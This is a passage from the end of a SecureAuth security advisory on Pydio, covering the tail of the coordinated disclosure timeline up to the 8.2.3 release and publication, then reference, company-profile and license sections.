2019-03-15: SecureAuth informed Pydio that the fixed version was tested
and all the reported vulnerabilities were addressed. In addition,
SecureAuth proposed to postpone the release date to Thursday the 21st.
2019-03-18: Pydio thanked SecureAuth for the answer and agreed on the
proposal.
2019-03-21: Pydio released version 8.2.3.
2019-03-28: Advisory SAUTH-2019-0002 published.
  
9. *References*  
  
[1] https://pydio.com/en/about-us  
  
10. *About SecureAuth Labs*  
  
SecureAuth Labs, the research arm of SecureAuth Corporation, is charged  
with anticipating the future needs and requirements for information  
security technologies. We conduct research in several important areas of  
computer security, including identity-related attacks, system  
vulnerabilities and cyber-attack planning. Research includes problem  
formalization, identification of vulnerabilities, novel solutions and  
prototypes for new technologies. We regularly publish security  
advisories, primary research, technical publications, research blogs,  
project information, and shared software tools for public use at  
http://www.secureauth.com.  
  
11. *About SecureAuth*  
  
SecureAuth is leveraged by leading companies, their employees, their  
customers and their partners to eliminate identity-related breaches. As  
a leader in access management, SecureAuth is powering an identity  
security revolution by enabling people and devices to intelligently and  
adaptively access systems and data, while effectively keeping bad actors  
from doing harm. By ensuring the continuous assessment of risk and  
enablement of trust, SecureAuth's highly flexible platform makes it  
easier for organizations to prevent the misuse of credentials. To learn  
more, visit www.secureauth.com, call (949) 777-6959, or email us at  
[email protected]  
  
12. *Disclaimer*  
  
The contents of this advisory are copyright (c) 2019 SecureAuth, and are  
licensed under a Creative Commons Attribution Non-Commercial Share-Alike  
3.0 (United States) License:  
http://creativecommons.org/licenses/by-nc-sa/3.0/us/  
  
